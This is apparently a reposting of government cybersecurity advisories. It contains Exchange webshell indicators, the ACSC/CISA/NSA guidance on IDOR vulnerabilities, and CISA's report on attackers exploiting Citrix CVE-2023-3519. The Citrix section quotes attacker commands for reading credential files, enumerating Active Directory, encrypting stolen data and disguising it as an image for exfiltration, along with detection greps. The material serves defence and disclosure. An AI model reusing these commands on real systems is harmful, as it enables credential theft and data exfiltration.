ba4a616c8d4ab9358a82b321d8e618bf

bcd62f3e029f96f62c24d50d2d1402ac

bcf75736d176394f3df69f3e0ef7dd9f

be1f24457141d80206bc2e58f55dc879

c013f308d170aa2eca4a5b0f0bbd3ccb

c0a2fd066c955137036f92da2c3a3ff1

c17b3ec40ed5216e44311138aafaea2c

c262a39f49604f05a5656213f758cd46

c66f36eb180438882133717c3abb5157

c986c7bf720ce1463c3d628d2b3dad01

c9c16287cbbe5a037244e374ba84aecc

cbcd728a2350712b5747cd3447473deb

cbeeb123efe8cf7f842426b673415c28

ccb15eef4287c8efa472915bcb4ec458

ccdddb69e9344a039c4ac9c49a6f2d7b

cd1312be032256a10cf866af3e9afae9

ce0dd163d9e02bfd42d61024523cb134

ceef2e728db1b5ae15432f844eeb66e1

d12d98a0877f6e3c8b5a59f41cc4de9b

d131f17689f1f585e9bfdcdb72a626bb

d173076d97a0400a56c81089912b9218

d255291bb8e460626cb906ebacc670e5

d2cea317778ad6412c458a8a33b964fd

d3cfee76468a9556fd9d017c1c8ee028

d3d72f4c7038f7313ad0570e16c293bf

d485a1b5db2f97dc56500376d677aa89

d662d20507bebc37b99a4d413afa2752

d711d577b9943ab4e2f8a2e06bb963e3

d92e87d2689957765987e2be732d728e

d966c6c822122e96f6e9f5f1d4778391

daee31d7cc6e08ead6afad2175989e1d

dbb293176747fa1c2e03cbc09433f236

dc26ef761c7ec40591b1fe6e561b521d

dc9e6edeb7557bc80be68be15cebb77a

dddfbae77336120febd5ad690af3e341

e1f579227327ebb21cde3f9e7511db01

e3c642432a815a07f035e01308aaa8fc

e54329351788661f2a8d4677a759fc42

e82b7ad2c05f4617efbc86a78c1e61e9

e99cffa2afa064625f09e1c5aca8f961

ea6bd3db104ca210b5ad947d46134aaf

eb277d809a59d39d02605c0edd9333e9

ed82a50d98700179c8ae70429457477a

ef35374f4146b3532f0902d6f7f0ef8c

ef4c4d79f02ac404f47513d3a73e20c7

f05a5a60ad6f92d6f28fa4f13ded952f

f0776dfe17867709fdb0e0183ed71698

f20fbfd508e24d50522eadf0186b03eb

f3d751b0585855077b46dfce226cfea1

f4dd9bb28d680a3368136fb3755e7ea9

f804388f302af1f999e4664543c885a1

f8bcc8f99a3afde66d7f5afb5d8f1b43

f8d6f89aecf792e844e72015c9f27c95

f967460f8c6de1cedb180c90c98bfe98

f9d5cc0cbae77ea1a371131f62662b6b

fa4f1a3b215888bc5f19b9f91ba37519

fdff2bf247a7dad40bac228853d5a661

fe6e7fac4f0b4f25d215e28ca8a22957

fe9de1cdd645971c5d15ee1873c3ff8d

febba89b4b9a9649b3a3bf41c4c7d853

NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

NCSC-NO observed the following user agents communicating with Exchange webshell:

Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7

Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7

Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36

Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36

Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1

NCSC-NO observed the following user agents communicating with Exchange Autodiscover:

ExchangeServicesClient/15.00.0913.015

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0

NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67

NCSC-NO observed the following user agent communicating with Exchange (/powershell):

Windows WinRM Client

Source de l’article sur us-cert.gov

1 August 2023/by Service comm.

Preventing Web Application Access Control Abuse

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), U.S. Cybersecurity and Infrastructure Security Agency (CISA), and U.S. National Security Agency (NSA) are releasing this joint Cybersecurity Advisory to warn vendors, designers, and developers of web applications and organizations using web applications about insecure direct object reference (IDOR) vulnerabilities. IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web application programming interface (API) specifying the user identifier of other, valid users. These requests succeed where there is a failure to perform adequate authentication and authorization checks.

These vulnerabilities are frequently exploited by malicious actors in data breach incidents because they are common, hard to prevent outside the development process, and can be abused at scale. IDOR vulnerabilities have resulted in the compromise of personal, financial, and health information of millions of users and consumers.

ACSC, CISA, and NSA strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce prevalence of IDOR flaws and protect sensitive data in their systems.

Vendors, designers, and developers of web application frameworks and web applications: Implement secure-by-design and -default principles and ensure software performs authentication and authorization checks for every request that modifies, deletes, and accesses sensitive data.
- Use automated tools for code review to identify and remediate IDOR and other vulnerabilities.
- Use indirect reference maps, ensuring that IDs, names, and keys are not exposed in URLs. Replace them with cryptographically strong, random values—specifically use a universally unique identifier (UUID) or a globally unique identifier (GUID).
- Exercise due diligence when selecting third-party libraries or frameworks to incorporate into your application and keep all third-party frameworks and dependencies up to date.
All end-user organizations, including organizations with software-as-a-service (SaaS) models:
- Use due diligence when selecting web applications. Follow best practices for supply chain risk management and only source from reputable vendors.
- Apply software patches for web applications as soon as possible.
End-user organizations deploying on-premises software, infrastructure-as-a-service (IaaS), or private cloud models:
- Review the available authentication and authorization checks in web applications that enable modification of data, deletion of data, or access to sensitive data.
- Conduct regular, proactive vulnerability scanning and penetration testing to help ensure internet-facing web applications and network boundaries are secure.

Download the PDF version of this report:

AA23-208A Preventing Web Application Access Control Abuse (PDF, 587.80 KB )

TECHNICAL DETAILS

Description

IDOR vulnerabilities are access control vulnerabilities in web applications (and mobile phone applications [apps] using affected web API) that occur when the application or API uses an identifier (e.g., ID number, name, or key) to directly access an object (e.g., a database record) but does not properly check the authentication or authorization of the user submitting the request. Depending on the type of IDOR vulnerability, malicious actors can access sensitive data, modify or delete objects, or access functions.

Horizontal IDOR vulnerabilities occur when a user can access data that they should not be able to access at the same privilege level (e.g., other user’s data).
Vertical IDOR vulnerabilities occur when a user can access data that they should not be able to access because the data requires a higher privilege level.
Object-level IDOR vulnerabilities occur when a user can modify or delete an object that they should not be able to modify or delete.
Function-level IDOR vulnerabilities occur when a user can access a function or action that they should not be able to access.

Typically, these vulnerabilities exist because an object identifier is exposed, passed externally, or easily guessed—allowing any user to use or modify the identifier.

In body manipulation, an actor modifies the HTML form field data in the body of a POST request to impact targeted records.
In URL tampering, an actor modifies an identifier in URLs to impact targeted records.
In cookie ID manipulation, the actor modifies an identifier in a cookie to an identifier of a different user (including administrative users) in an attempt to gain access to that account.
In HTTP/JSON request tampering, an actor uses a web proxy to intercept and alter arbitrary portions of legitimate requests, including values inside JSON objects.

Impact

These vulnerabilities are common[1] and hard to prevent outside the development process since each use case is unique and cannot be mitigated with a simple library or security function. Additionally, malicious actors can detect and exploit them at scale using automated tools. These factors place end-user organizations at risk of data leaks (where information is unintentionally exposed) or large-scale data breaches (where a malicious actor obtains exposed sensitive information). Data leaks or breaches facilitated by IDOR vulnerabilities include:

An October 2021 global data leak incident where mobile phone data, including text messages, call records, photos, and geolocation from hundreds of thousands of devices was exposed by insecure “stalkerware” apps.[2] The apps collected and relayed data from the phones to the same foreign server infrastructure, which contained an IDOR vulnerability, CVE-2022-0732.[3] This led to exposure of the collected app data.[4]
A 2019 data breach incident where more than 800 million personal financial files, including bank statements, bank account numbers, and mortgage payment documents, from a U.S. Financial Services Sector organization were exposed.[5],[6]
A 2012 data breach incident where a malicious cyber actor obtained the personal data of more than 100,000 mobile device owners from a U.S. Communications Sector organization’s publicly accessible website.[7]

MITIGATIONS

Vendors and Developers

ACSC, CISA, and NSA recommend that vendors, designers, and implementors of web applications—including organizations that build and deploy software (such as HR tools) for their internal use and organizations that create open-source projects—implement the following mitigations. These mitigations may reduce prevalence of IDOR vulnerabilities in software and help ensure products are secure-by-design and -default.

Implement and inject secure-by-design and -default principles and best practices into each stage of the software development life cycle (SDLC). Particular recommended practices are defined in the National Institute of Security and Technology’s (NIST’s) Secure Software Development Framework (SSDF), SP 800-218. Lend special attention to:
- Conducting code reviews [SSDF PW 7.2, RV 1.2] against peer coding standards, checking for backdoors, malicious content, or logic flaws.
  - ACSC, CISA, and NSA recommend using automated code analysis tools for all supported releases to identify and remediate vulnerabilities.
- Following secure coding practices [SSDF PW 5.1] for web and mobile applications to ensure that they properly validate user input and generate strong user IDs.
  - Use indirect reference maps, such that IDs, names, and keys are not exposed in URLs. Replace them with cryptographically strong, random values—specifically use a UUID or a GUID. Note: UUIDs and GUIDs should not be used for security capabilities. See Request for Comment (RFC) 4122 for more information.
  - Configure applications to deny access by default and ensure the application performs authentication and authorization checks for every request to modify data, delete data, and access sensitive data. For example:
    - Normalize requests. There are many ways to encode and decode web inputs. Decode and normalize inputs before creating access control checkpoints. Ensure the access control system and other parts of the web application perform the same normalization.
    - Implement parameter verification leveraging syntactic and logical validation, such that web applications validate all inputs received with every HTTP/S request. Denying invalid requests can reduce the burden on the access control system.
      - Syntactic validation verifies that for each input the incoming value meets your applications’ expectations. When doing syntactic validation, verify that strings are within the minimum and maximum length required, strings do not contain unacceptable characters, numeric values are within the minimum and maximum boundaries, and the input is of the proper data type.
      - Logical validation adds checks to see if the input values make sense and are consistent with design intent. When doing logical validation, verify authorization checks are performed in the correct locations, are of varying pedigree, and that there is error handling of failed authentication and authorization requests.
  - Use CAPTCHA to limit automated invalid user requests where feasible.
  - Use memory-safe programming languages where possible.
- Testing code to identify vulnerabilities and verify compliance with security requirements [SSDF PW 8.2].
- Use automated testing tools to facilitate testing, fuzz testing tools to find issues with input handling,[8] and penetration testing to simulate how a threat actor may exploit the software. Consider using dynamic application security testing (DAST) tools to identify IDOR vulnerabilities in web applications.
- Conducting role-based training [SSDF PO 2.2] for personnel responsible for secure software development.
- Exercising due diligence when selecting third-party libraries or frameworks to incorporate into your application [SSDF PW 4.1].
  - Review and evaluate third-party components in the context of their expected use.
  - Verify the integrity of the product through hash or signature verification.
  - If provided, review component’s Software Bill of Materials (SBOM) for outdated, vulnerable, or unauthorized applications before using it.
  - Keep all third-party frameworks and dependencies up to date to limit vulnerability inheritance. Note: Organizations should maintain an inventory or catalog of third-party frameworks and dependencies to assist with proactive updates. Consider using tools to identify project dependencies and known vulnerabilities in third-party code. See OWASP’s Top Ten Proactive Controls 2018, C2: Leverage Security Frameworks and Libraries, for more information.
    For more information, see the joint Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Developers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Establish a vulnerability disclosure program to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization.

Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices in production and enterprise environments. Software developers are high-value targets because their customers deploy software on their own trusted networks. For best practices, see:

ACSC’s Essential Eight. The Essential Eight are prioritized strategies to help cybersecurity professionals mitigate cybersecurity incidents caused by various cyber threats.
CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and NIST, are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, ACSC, CISA, and NSA also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
NSA’s Top Ten Cybersecurity Mitigations. The Top Ten sets priorities for enterprise activities to counter a broad range of exploitation techniques and minimize mission impact.

All End-User Organizations

ACSC, CISA, and NSA recommend that all end-user organizations, including those with on-premises software, SaaS, IaaS, and private cloud models, implement the mitigations below to improve their cybersecurity posture.

Exercise due diligence when selecting web applications. Follow best practices for supply chain risk management and source from reputable vendors that demonstrate commitment to secure-by-design and -default principles.
- Verify the integrity of the product through hash or signature verification.
- If provided, review the SBOM for outdated, vulnerable, or unauthorized applications before using the product.
  For more information, see the Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Customers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Apply software patches for web applications as soon as possible.
Configure the application to log and generate alerts from tamper attempts—with this information, network defenders can investigate and take appropriate follow-on actions.
- Establish a baseline to efficiently identify abnormal behavior. Note: Web application error codes such as HTTP 404 and HTTP 403 are associated with common enumeration techniques.
- Aggregate logs into a centralized solution (e.g., a security information and event management [SIEM] tool) to facilitate active monitoring and threat hunting.
Create, maintain, and exercise a basic cyber incident response plan (IRP) and associated communications plan. Plans should include response and notification procedures for data breach and cyber incidents. For more information, see:
- ACSC: Preparing for and Responding to Cyber Incidents
- ACSC: Cyber Incident Response Plan – Guidance
- ACSC: Cyber Incident Response Readiness Checklist
- Office of the Australian Information Commissioner (OAIC): Data Breach Preparation and Response
- OIAC: Data Breach Response Plan
- CISA: Incident Response Plan Basics
- CISA: Federal Government Cybersecurity Incident and Vulnerability Response Playbook (Although tailored to U.S. Federal Civilian Branch (FCEB) agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.)
- CISA: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches

Additionally, ACSC, CISA, and NSA recommend following cybersecurity practices. For best practices, see ACSC’s Essential Eight, CISA’s CPGs, and NSA’s Top Ten Cybersecurity Mitigation Strategies.

End-User Organizations with On-Premises Software, IaaS, or Private Cloud Models

ACSC, CISA, and NSA recommend that organizations:

Conduct regular, proactive penetration testing to ensure network boundaries, as well as web applications, are secure. Prioritize web applications that are internet-facing and contain user login functionality. Such testing may be beyond the technical or financial capabilities of some organizations. Consider using a trusted third party for penetration testing to discover new attack vectors (notably prior to deployment of new or altered internet-facing services). Note: Organizations should consult with their legal counsel as appropriate to determine which systems and applications can be included in the scope of the penetration testing.
- Use web application penetration testing tools to capture the user identifier sent to the web server when requesting a web page containing sensitive data and map all locations where user input is used to reference objects directly. Test with users of various privilege levels (e.g., a normal user and admin user).
Use DAST and other vulnerability scanners to detect IDOR vulnerabilities. DAST tools identify vulnerabilities in web applications with penetration tests and generate automated alerts. Note: Exercise due diligence when selecting DAST tools. Not all DAST tools can detect IDOR vulnerabilities—tools with the ability may need the environment configured in a specific way and may also need custom rules in place. Sufficient DAST tools often ingest the application API documentation to build a model of the application. While these tools can be used to detect IDOR vulnerabilities, they are not foolproof and should be used with other security testing methods to ensure comprehensive coverage.
Immediately report detected vulnerabilities to the vendor or developer. Alternatively (or if the vendor or developer fails to respond), report the vulnerability to CISA at cisa.gov/report.
Consider establishing a vulnerability disclosure program to verify, resolve, and report security vulnerabilities disclosed by people who may be internal or external to the organization.
Use a web application firewall (WAF) to filter, monitor, and block malicious HTTP/S traffic traveling to the web application.
Use a data loss prevention (DLP) tool to prevent unauthorized data from leaving the application.

ACSC, CISA, and NSA recommend that organizations with on-premises software or IaaS consider using SaaS models for their internet-facing websites.

End-User Organizations with SaaS Models

Organizations leveraging SaaS with sufficient resources may consider conducting penetration testing and using vulnerability scanners. However, such tests may interfere with service provider operations. Organizations should consult with their legal counsel as appropriate to determine what can be included in the scope of the penetration testing.

INCIDENT RESPONSE

If you or your organization are victim to a data breach or cyber incident, follow relevant cyber incident response and communications plans, as appropriate.

Australia: Australian organizations that have been impacted or require assistance in regards to a cybersecurity incident can contact ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
United States: U.S. organizations may report cybersecurity incidents to CISA’s 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

RESOURCES

For additional guidance on designing secure-by-design and -default products, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
For additional guidance on protecting against data breaches, see ACSC’s webpage on data breaches.

REFERENCES

[1] A01 Broken Access Control – OWASP Top 10:2021

[2] A massive ‘stalkerware’ leak puts the phone data of thousands at risk

[3] Mobile device monitoring services do not authenticate API requests

[4] Behind the stalkerware network spilling the private phone data of hundreds of thousands

[5] First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records

[6] Biggest Data Breaches in US History [Updated 2023]

[7] AT&T Hacker ‘Weev’ Sentenced to 3.5 Years in Prison

[8] Fuzzing | OWASP Foundation

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. ACSC, CISA, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States or Australian Governments, and this guidance shall not be used for advertising or product endorsement purposes.

PURPOSE

This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Source de l’article sur us-cert.gov

26 July 2023/by Service comm.

Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.

The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.

This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.

Download the PDF version of this report:

AA23-201A Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells (PDF, 469.66 KB )

TECHNICAL DETAILS

Overview

In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. Citrix confirmed that the actors exploited a zero-day vulnerability: CVE-2023-3519. Citrix released a patch on July 18, 2023.[1]

CVE-2023-3519

CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1]

NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13
NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13
NetScaler ADC and NetScaler Gateway version 12.1, now end of life
NetScaler ADC 13.1-FIPS before 13.1-37.159
NetScaler ADC 12.1-FIPS before 12.1-65.36
NetScaler ADC 12.1-NDcPP before 12.65.36

The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1]

CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.

Threat Actor Activity

As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid binary [T1548.001] on the ADC appliance and conducted SMB scanning on the subnet [T1046].

The actors used the webshell for AD enumeration [T1016] and to exfiltrate AD data [TA0010]. Specifically, the actors:

Viewed NetScaler configuration files /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf [T1005]. Note: These configuration files contain an encrypted password that can be decrypted by the key stored on the ADC appliance [T1552.001].
Viewed the NetScaler decryption keys (to decrypt the AD credential from the configuration file) [T1552.004].
Used the decrypted AD credential to query the AD via ldapsearch. The actors queried for:
- Users (objectClass=user) (objectcategory=person) [T1033]
- Computers (objectClass=computer) [T1018]
- Groups (objectClass=group) [T1069.002]
- Subnets (objectClass=subnet)
- Organizational Units (objectClass=organizationalUnit)
- Contacts (objectClass=contact)
- Partitions (objectClass=partition)
- Trusts (objectClass=trustedDomain) [T1482]
Used the following command to encrypt discovery data collected via openssl in “tar ball” [T1560.001]: tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz. (A “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration.)
Exfiltrated collected data by uploading as an image file [T1036.008] to a web-accessible path [T1074]: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png.

The actors’ other discovery activities were unsuccessful due to the critical infrastructure organization’s deployment of their NetScaler ADC appliance in a segmented environment. The actors attempted to:

Execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets.
Verified outbound network connectivity with a ping command (ping -c 1 google.com) [T1016.001].
Executed host commands for a subnet-wide DNS lookup.

The actors also attempted to delete their artifacts [TA0005]. The actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) [T1531]. To regain access to the ADC appliance, the organization would normally reboot into single use mode, which may have deleted artifacts from the device; however, the victim had an SSH key readily available that allowed them into the appliance without rebooting it.

The actors’ post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The actors implanted a second webshell on the victim that they later removed. This was likely a PHP shell with proxying capability. The actors likely used this to attempt proxying SMB traffic to the DC [T1090.001] (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1–Table 9 for all referenced threat actor tactics and techniques in this advisory.

*Table 1: Cyber Threat Actors ATT&CK Techniques for Initial Access*
Technique Title	ID	Use
Exploit Public-Facing Application	T1190	The threat actors exploited CVE-2023-3519 to implant a webshell on the organization’s NetScaler ADC appliance.

*Table 2: Cyber Threat Actors ATT&CK Techniques for Persistence*
Technique Title	ID	Use
Server Software Component: Web Shell	T1505.003	The threat actors implanted a generic webshell on the organization’s NetScaler ADC appliance.

*Table 3: Cyber Threat Actors ATT&CK Techniques for Privilege Escalation*
Technique Title	ID	Use
Abuse Elevation Control Mechanism: Setuid and Setgid	T1548.001	As part of their initial exploit chain uploaded a TGZ file contain a `setuid` binary on the ADC appliance.

Table 4: Cyber Threat Actors ATT&CK Techniques for Defense Evasion
Technique Title	ID	Use
Masquerading: Masquerade File Type	T1036.008	The threat actors exfiltrated data by uploading it as an image file to a web-accessible path.

Table 5: Cyber Threat Actors ATT&CK Techniques for Credential Access
Technique Title	ID	Use
Unsecured Credentials: Credentials In Files	T1552.001	The threat actors obtained encrypted passwords from NetScaler ADC configuration files, and the decryption key was stored on the ADC appliance.
Unsecured Credentials: Private Keys	T1552.004	The threat actors obtained decryption keys to decrypt the AD credential obtained from the NetScaler ADC configuration files.

*Table 6: Cyber Threat Actors ATT&CK Techniques for Discovery*
Technique Title	ID	Use
Domain Trust Discovery	T1482	The threat actors queried the AD for trusts.
Permission Groups Discovery: Domain Groups	T1069.002	The threat actors quired the AD for groups.
Remote System Discovery	T1018	The threat actors queried the AD for computers. The threat actors attempted to execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets. Network-segmentation controls prevented this activity.
System Network Configuration Discovery	T1016	The actors used a webshell for AD enumeration.
System Network Configuration Discovery: Internet Connection Discovery	T1016.001	The threat actors attempted to verify outbound network connectivity with a ping command and executed host commands for a subnet-wide DNS lookup. Network-segmentation controls prevented this activity.
Network Service Discovery	T1046	The threat actors conducted SMB scanning on the organization’s subnet.
Account Discovery: Domain Account	T1087.002	The threat actors queried the AD for users.

*Table 7: Cyber Threat Actors ATT&CK Techniques for Collection*
Technique Title	ID	Use
Archive Collected Data: Archive via Utility	T1560.001	The threat actors encrypted discovery data collected via openssl in “tar ball.”
Data from Local System	T1005	The threat actors viewed NetScaler ADC configuration files `flash/nsconfig/keys/updated/*` and `/nsconfig/ns.conf`.
Data Staged	T1074	The threat actors uploaded data as an image file to a web-accessible path: `cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png`.

*Table 8: Cyber Threat Actors ATT&CK Techniques for Command and Control*
Technique Title	ID	Use
Ingress Tool Transfer	T1105	The threat actors exploited CVE-2023-3519 to upload a TGZ file containing a generic webshell, discovery script, and setuid binary on the ADC appliance.
Proxy: Internal Proxy	T1090.001	The actors likely used a PHP shell with proxying capability to attempt proxying SMB traffic to the DC (the traffic was blocked by a firewall and account restrictions).

*Table 9: Cyber Threat Actors ATT&CK Techniques for Impact*
Technique Title	ID	Use
Account Access Removal	T1531	The threat actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users from logging in remotely (e.g., CLI).

DETECTION METHODS

Run the following victim-created checks on the ADC shell interface to check for signs of compromise:

Check for files newer than the last installation.
Modify the -newermt parameter with the date that corresponds to your last installation:
- find /netscaler/ns_gui/ -type f -name *.php -newermt [YYYYMMDD] -exec ls -l {} ;
- find /var/vpn/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
- find /var/netscaler/logon/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
- find /var/python/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
Check http error logs for abnormalities that may be from initial exploit:
- grep '.sh' /var/log/httperror.log*
- grep '.php' /var/log/httperror.log*
Check shell logs for unusual post-ex commands, for example:
- grep '/flash/nsconfig/keys' /var/log/sh.log*
Look for setuid binaries dropped:
- find /var -perm -4000 -user root -not -path "/var/nslog/*" -newermt [YYYYMMDD] -exec ls -l {} ;
Review network and firewall logs for subnet-wide scanning of HTTP/HTTPS/SMB (80/443/445) originating from the ADC.
Review DNS logs for unexpected spike in internal network computer name lookup originating from the ADC (this may indicate the threat actor resolving host post-AD enumeration of computer objects).
Review network/firewall logs for unexpected spikes in AD/LDAP/LDAPS traffic originating from the ADC (this may indicate AD/LDAP enumeration).
Review number of connections/sessions from NetScaler ADC per IP address for excessive connection attempts from a single IP (this may indicate the threat actor interacting with the webshell).
Pay attention to larger outbound transfers from the ADC over a short period of session time as it can be indicative of data exfiltration.
Review AD logs for logon activities originating from the ADC IP with the account configured for AD connection.
If logon restriction is configured for the AD account, check event 4625 where the failure reason is “User not allowed to logon at this computer.”
Review NetScaler ADC internal logs (sh.log*, bash.log*) for traces of potential malicious activity (some example keywords for grep are provided below):
- database.php
- ns_gui/vpn
- /flash/nsconfig/keys/updated
- LDAPTLS_REQCERT
- ldapsearch
- openssl + salt
Review NetScaler ADC internal access logs (httpaccess-vpn.log*) for 200 successful access of unknown web resources.

INCIDENT RESPONSE

If compromise is detected, organizations should:

Quarantine or take offline potentially affected hosts.
Reimage compromised hosts.
Provision new account credentials.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

MITIGATIONS

CISA recommends all organizations:

Install the relevant updated version of NetScaler ADC and NetScaler Gateway as soon as possible. See Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 for patch information.
Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and for all services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of information technology (IT) and operational technology (OT) security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and ACSC also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
As a longer-term effort, apply robust network-segmentation controls on NetScaler appliances, and other internet-facing devices.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Table 1–Table 9).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
